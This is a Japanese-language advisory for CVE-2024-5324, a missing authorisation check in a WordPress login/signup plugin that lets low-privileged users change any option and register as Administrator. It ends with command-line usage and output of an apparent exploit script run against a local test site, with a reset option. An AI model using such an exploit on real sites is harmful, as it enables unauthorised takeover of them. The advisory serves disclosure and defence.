
Login/Signup Popup ( Inline Form + Woocommerce ) 2.7.1 - 2.7.2 - 任意のオプション更新に対する認可の欠如
WordPress用プラグインLogin/Signup Popup (Inline Form + Woocommerce) は、バージョン2.7.1から2.7.2において、import_settings関数に対するcapabilityチェックが欠如しているため、データの無許可変更に対して脆弱です。これにより、Subscriberレベル以上のアクセス権を持つ認証済み攻撃者が、影響を受けるサイト上の任意のオプションを変更できる可能性があります。この脆弱性を悪用すると、新規ユーザー登録を有効にし、新規ユーザーのデフォルトロールをAdministratorに設定することができます。
Severity: high
CVE ID: CVE-2024-5324
CVSS Score: 8.8
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Plugin Slug: easy-login-woocommerce
WPScan URL: https://www.wpscan.com/plugin/easy-login-woocommerce
Reference URL: https://www.wordfence.com/threat-intel/vulnerabilities/id/005a27c6-b9eb-466c-b0c3-ce52c25bb321?source=api-prod
$ python3 CVE-2024-5324.py --url http://wordpress.lan -un test -p test
The plugin version is 2.7.1.
Vulnerability check: http://wordpress.lan
Logged in successfully.
Option set successfully: http://wordpress.lan/wp-admin/admin-ajax.php
You can now register a user on the as a admin.
$ python3 CVE-2024-5324.py --url http://wordpress.lan -un test -p test --fix e
The plugin version is 2.7.1.
Vulnerability check: http://wordpress.lan
Logged in successfully.
Option set successfully: http://wordpress.lan/wp-admin/admin-ajax.php
Options reset to default